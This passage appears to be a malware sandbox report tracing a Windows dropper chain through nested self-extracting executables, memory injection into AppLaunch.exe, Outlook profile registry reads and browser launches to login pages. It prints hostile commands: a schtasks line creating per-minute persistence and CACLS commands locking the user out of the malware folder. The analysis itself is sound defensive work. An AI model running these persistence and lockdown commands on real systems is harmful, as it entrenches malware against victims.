Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\953A.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5344.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 880 wrote to memory of 4356 N/A C:\Users\Admin\AppData\Local\Temp\1683c438c813733a324aba4dc75fd5d9923538aa41e16ad9e11e422d6ed8bc77.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe
PID 880 wrote to memory of 4356 N/A C:\Users\Admin\AppData\Local\Temp\1683c438c813733a324aba4dc75fd5d9923538aa41e16ad9e11e422d6ed8bc77.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe
PID 880 wrote to memory of 4356 N/A C:\Users\Admin\AppData\Local\Temp\1683c438c813733a324aba4dc75fd5d9923538aa41e16ad9e11e422d6ed8bc77.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe
PID 4356 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe
PID 4356 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe
PID 4356 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe
PID 644 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe
PID 644 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe
PID 644 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe
PID 3824 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe
PID 3824 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe
PID 3824 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe
PID 1596 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe
PID 1596 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe
PID 1596 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe
PID 4784 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe
PID 4784 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe
PID 4784 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe
PID 1604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4784 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe
PID 4784 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe
PID 4784 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1596 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe
PID 1596 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe
PID 1596 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe
PID 3824 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe
PID 3824 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe
PID 3824 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe
PID 5108 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5108 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5108 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5108 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5108 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5108 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5108 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5108 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 644 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe
PID 644 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe
PID 644 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe
PID 1780 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1780 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1780 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4356 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6YX3Uu6.exe
PID 4356 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6YX3Uu6.exe
PID 4356 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6YX3Uu6.exe
PID 2736 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 2736 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\40F2.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\40F2.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\1683c438c813733a324aba4dc75fd5d9923538aa41e16ad9e11e422d6ed8bc77.exe

"C:\Users\Admin\AppData\Local\Temp\1683c438c813733a324aba4dc75fd5d9923538aa41e16ad9e11e422d6ed8bc77.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2524 -ip 2524

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2524 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6YX3Uu6.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6YX3Uu6.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7mK1fU19.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7mK1fU19.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2D64.tmp\2D65.tmp\2D66.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7mK1fU19.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

